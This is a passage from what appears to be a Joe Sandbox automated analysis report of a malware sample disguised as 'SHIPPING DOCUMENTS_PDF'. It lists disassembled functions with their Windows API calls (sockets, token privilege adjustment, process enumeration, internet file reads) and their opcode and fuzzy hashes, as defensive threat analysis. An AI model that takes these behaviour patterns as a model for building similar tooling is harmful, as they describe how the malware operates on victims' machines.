                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                    • String ID:
                                                                                    • API String ID: 2387731787-0
                                                                                    • Opcode ID: 3279ff22c237b10cffac593e363424036c452ef07ac2529b2555061b921cd1c0
                                                                                    • Instruction ID: 29fd0b929763af90461c4086537925d2bd0f1c4e3f50598b3c7a7c9eb7c22650
                                                                                    • Opcode Fuzzy Hash: 3279ff22c237b10cffac593e363424036c452ef07ac2529b2555061b921cd1c0
                                                                                    • Instruction Fuzzy Hash: 22516E356046029FC714DF68D491EAAB3E4EF49320F1446AEF966873A1DBB4ED04CB91
                                                                                    Function 00BC6747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00BC7D8B: inet_addr.WSOCK32(00000000), ref: 00BC7DB6
                                                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 00BC679E
                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00BC67C7
                                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00BC6800
                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00BC680D
                                                                                    • closesocket.WSOCK32(00000000), ref: 00BC6821
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                                    • String ID:
                                                                                    • API String ID: 99427753-0
                                                                                    • Opcode ID: 0ba09b17cf2f15fe89ab6d6374c58f4e4d90f3696aeb850bc336d255b0023ad9
                                                                                    • Instruction ID: a224b9ecef3d0374be4b2c3a4b5abf5c287ad34550c02198098cd513e0ef4f91
                                                                                    • Opcode Fuzzy Hash: 0ba09b17cf2f15fe89ab6d6374c58f4e4d90f3696aeb850bc336d255b0023ad9
                                                                                    • Instruction Fuzzy Hash: 5D419D75A00210AFEB10BF248C86F6E77E89B45755F0484EDFD1AAB2D2DA709D048B91
                                                                                    Function 00BD5376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                    • String ID:
                                                                                    • API String ID: 292994002-0
                                                                                    • Opcode ID: 58eb10d48aafdb242512adaa2eeece0e01bbaf57b5de13bb844886b903c1e6ee
                                                                                    • Instruction ID: 6ff9671fe07c395d85a2638f7208fa9c9b8dd593bc5a55e2524b0e29aee8282e
                                                                                    • Opcode Fuzzy Hash: 58eb10d48aafdb242512adaa2eeece0e01bbaf57b5de13bb844886b903c1e6ee
                                                                                    • Instruction Fuzzy Hash: B911D0317019116BEB306F269C44B6AFBD8EF443A1B0040AAE847D7341EB70DD018AA8
                                                                                    Function 00BA80A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00BA80C0
                                                                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00BA80CA
                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00BA80D9
                                                                                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00BA80E0
                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00BA80F6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                    • String ID:
                                                                                    • API String ID: 44706859-0
                                                                                    • Opcode ID: fbfb880b4e5806fe84dd6c98a2fee5b2e07ee332648ff41966013ec9de4616f7
                                                                                    • Instruction ID: 6e240d5f171be7ceaf8789f93b3591090b795dd8bc73ecac4ea9c0e2fc98d23f
                                                                                    • Opcode Fuzzy Hash: fbfb880b4e5806fe84dd6c98a2fee5b2e07ee332648ff41966013ec9de4616f7
                                                                                    • Instruction Fuzzy Hash: 37F0C230209206BFEB100FA4EC8DE777BBCEF4A754B000026F906D3150DF609D01DA60
                                                                                    Function 00B54B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00B54AD0), ref: 00B54B45
                                                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00B54B57
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                    • API String ID: 2574300362-192647395
                                                                                    • Opcode ID: a502e4d6270b15bd2afff9ca21b4ae6444f007f17d0c360e6337944c2f1e0a92
                                                                                    • Instruction ID: 98cb5ba76f63fb4fb231ce95fea04c8512b2a12d62cc54742b1eaab546ee70f8
                                                                                    • Opcode Fuzzy Hash: a502e4d6270b15bd2afff9ca21b4ae6444f007f17d0c360e6337944c2f1e0a92
                                                                                    • Instruction Fuzzy Hash: 30D01234A14713CFD7209F31D868B16B6D4EF05355B1588BB9897D6260FB70D4C0C654
                                                                                    Function 00B63030 Relevance: 6.6, APIs: 4, Instructions: 587COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: __itow__swprintf
                                                                                    • String ID:
                                                                                    • API String ID: 674341424-0
                                                                                    • Opcode ID: b677e78cb948c82ef2a5206892ba1467e883bf15ad15911787a988e716b39c36
                                                                                    • Instruction ID: 72cd3a0a32067020924cb736e64493ab0f8e7dee43ddb8492cbe5d13b4d82133
                                                                                    • Opcode Fuzzy Hash: b677e78cb948c82ef2a5206892ba1467e883bf15ad15911787a988e716b39c36
                                                                                    • Instruction Fuzzy Hash: E02289716083019FCB24DF24C891B6EB7E4EF85710F1449ADF89A97391DB75EA08CB92
                                                                                    Function 00BCEE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00BCEE3D
                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00BCEE4B
                                                                                      • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 00BCEF0B
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00BCEF1A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                                    • String ID:
                                                                                    • API String ID: 2576544623-0
                                                                                    • Opcode ID: d9fe4ea30c716c914fede3aa82dd590623509315b99055166f55cdbcc0827d40
                                                                                    • Instruction ID: 229eeb0aceca8f13619c60a27eb6843187a9b7ef92bc2644c9df850f144654d6
                                                                                    • Opcode Fuzzy Hash: d9fe4ea30c716c914fede3aa82dd590623509315b99055166f55cdbcc0827d40
                                                                                    • Instruction Fuzzy Hash: CD515A71508311ABD320EF24DC85F6BB7E8EF94750F1048ADF995972A1EB70E908CB92
                                                                                    Function 00B5FCE0 Relevance: 5.5, APIs: 3, Instructions: 1040COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharUpper
                                                                                    • String ID:
                                                                                    • API String ID: 3964851224-0
                                                                                    • Opcode ID: 819b6ea5ab4d9f99fd973d7eb7ae280bc3310a6bf0b3af31dde8ae3749348b91
                                                                                    • Instruction ID: 133d1a8b40bba1d40241dbc6521b2dd5999847779754aa9a6dec850a18d46ff2
                                                                                    • Opcode Fuzzy Hash: 819b6ea5ab4d9f99fd973d7eb7ae280bc3310a6bf0b3af31dde8ae3749348b91
                                                                                    • Instruction Fuzzy Hash: 769236706183419FDB24EF15C480B2BB7E1FB89304F1489ADE89A9B362D775EC45CB92
                                                                                    Function 00BAE616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00BAE628
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: lstrlen
                                                                                    • String ID: ($|
                                                                                    • API String ID: 1659193697-1631851259
                                                                                    • Opcode ID: 2de064ec2cb41c18d011457914aa9d984fe51f7677925cb8038ae25061adce6b
                                                                                    • Instruction ID: f3a986dac47a90d9476cbb93ac6e405ee8c54c8299c3357fa155c59bb5743baa
                                                                                    • Opcode Fuzzy Hash: 2de064ec2cb41c18d011457914aa9d984fe51f7677925cb8038ae25061adce6b
                                                                                    • Instruction Fuzzy Hash: 26322475A047059FDB28CF59C48196AB7F1FF48320B15C4AEE8AADB3A1E770E941CB40
                                                                                    Function 00BC22EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00BC180A,00000000), ref: 00BC23E1
                                                                                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00BC2418
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Internet$AvailableDataFileQueryRead
                                                                                    • String ID:
                                                                                    • API String ID: 599397726-0
                                                                                    • Opcode ID: 770aedc90b489667cc31e852cf0a11c3eb109ed59c4d67ef5e8de293df889ac5
                                                                                    • Instruction ID: 031299da017675b9bc7607d995de80fccc4303d4bbea2a535dce817f2d3cf9ca
                                                                                    • Opcode Fuzzy Hash: 770aedc90b489667cc31e852cf0a11c3eb109ed59c4d67ef5e8de293df889ac5
                                                                                    • Instruction Fuzzy Hash: 4741E271A04209BFEB209F95DC81FBBB7FCEB80714F1040AEF615A7240EA749E419664
                                                                                    Function 00BBB3FB Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 00BBB40B
                                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00BBB465
                                                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00BBB4B2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorMode$DiskFreeSpace
                                                                                    • String ID:
                                                                                    • API String ID: 1682464887-0
                                                                                    • Opcode ID: 7e398c5c11db5ac5c6bb97bef67356a1254f62db0dae7a4fe30b59bb92f7690f
                                                                                    • Instruction ID: 5f56843f3f2d45db027d8df14923181b0ca9586a466ba5b8fcbd272a43d0d4f9
                                                                                    • Opcode Fuzzy Hash: 7e398c5c11db5ac5c6bb97bef67356a1254f62db0dae7a4fe30b59bb92f7690f
                                                                                    • Instruction Fuzzy Hash: 6D214A75A00518EFCB00EFA5D890AFDBBF8FF49311F1480AAE905AB361DB319919CB51
                                                                                    Function 00BA87E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00B70DB6: std::exception::exception.LIBCMT ref: 00B70DEC
                                                                                      • Part of subcall function 00B70DB6: __CxxThrowException@8.LIBCMT ref: 00B70E01
                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00BA882B
                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00BA8858
                                                                                    • GetLastError.KERNEL32 ref: 00BA8865
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                    • String ID:
                                                                                    • API String ID: 1922334811-0
                                                                                    • Opcode ID: bfb0a42f369e6741c54643507bd13d5d9f04c805aedd0d2a387619c21ef7ff88
                                                                                    • Instruction ID: 2e161c6c4d6b07ba67ee330a809a927d5372e2fb7ca59bea94c2b34ba94f69c1
                                                                                    • Opcode Fuzzy Hash: bfb0a42f369e6741c54643507bd13d5d9f04c805aedd0d2a387619c21ef7ff88
                                                                                    • Instruction Fuzzy Hash: 2B1160B1818305AFD718EF94DC85D6BB7F8EB45710B10856EE45A97641EE34AC408B60
                                                                                    Function 00BA874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00BA8774
                                                                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00BA878B
                                                                                    • FreeSid.ADVAPI32(?), ref: 00BA879B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                    • String ID:
                                                                                    • API String ID: 3429775523-0
                                                                                    • Opcode ID: c3199297661d0ba3b05b91fc02c48cdc14f8a476ab8d46f282da88681596a0ed
                                                                                    • Instruction ID: d8ca4e9ae32616991e549c8adb50b1ef13be0524479796e2536d6d164a00e8a9
                                                                                    • Opcode Fuzzy Hash: c3199297661d0ba3b05b91fc02c48cdc14f8a476ab8d46f282da88681596a0ed
                                                                                    • Instruction Fuzzy Hash: 7AF04F7591530DBFDF00DFF4DC99ABDBBBCEF08201F5044A9A502E3281E6715A048B50
                                                                                    Function 00BBC6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00BBC6FB
                                                                                    • FindClose.KERNEL32(00000000), ref: 00BBC72B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$CloseFileFirst
                                                                                    • String ID:
                                                                                    • API String ID: 2295610775-0
                                                                                    • Opcode ID: 3b6aa9e81d66fb32ea4991fa4b28d88972052944be04de8938a10cde16b4cb42
                                                                                    • Instruction ID: 571586f073e2a353af14dff12f3723585fdcec254356e8f3b2677b62bce6e980
                                                                                    • Opcode Fuzzy Hash: 3b6aa9e81d66fb32ea4991fa4b28d88972052944be04de8938a10cde16b4cb42
                                                                                    • Instruction Fuzzy Hash: E21182716046049FDB10DF29C855A6AF7E5EF45361F04855EF8A58B290DB70AC05CF81
                                                                                    Function 00BBA06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00BC9468,?,00BDFB84,?), ref: 00BBA097
                                                                                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00BC9468,?,00BDFB84,?), ref: 00BBA0A9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorFormatLastMessage
                                                                                    • String ID:
                                                                                    • API String ID: 3479602957-0
                                                                                    • Opcode ID: ed04976ea06df65f9682e70db53b8cfac670b8530563a5b6152ce333a6966981
                                                                                    • Instruction ID: 27391c8ca56d3dcfeb052199035b5e3fe7eb0446323b8ca16cf3642d68163259
                                                                                    • Opcode Fuzzy Hash: ed04976ea06df65f9682e70db53b8cfac670b8530563a5b6152ce333a6966981
                                                                                    • Instruction Fuzzy Hash: 3EF0823554522EBBDB21AFA4DC48FFA77ACFF08361F0041A6F909D7191DA709944CBA1
                                                                                    Function 00BA81CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00BA8309), ref: 00BA81E0
                                                                                    • CloseHandle.KERNEL32(?,?,00BA8309), ref: 00BA81F2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                                                    • String ID:
                                                                                    • API String ID: 81990902-0
                                                                                    • Opcode ID: 5cae04e1c8fb1ab7c28221350c37be53e45e677a30534319443fbd0c9a0742bd
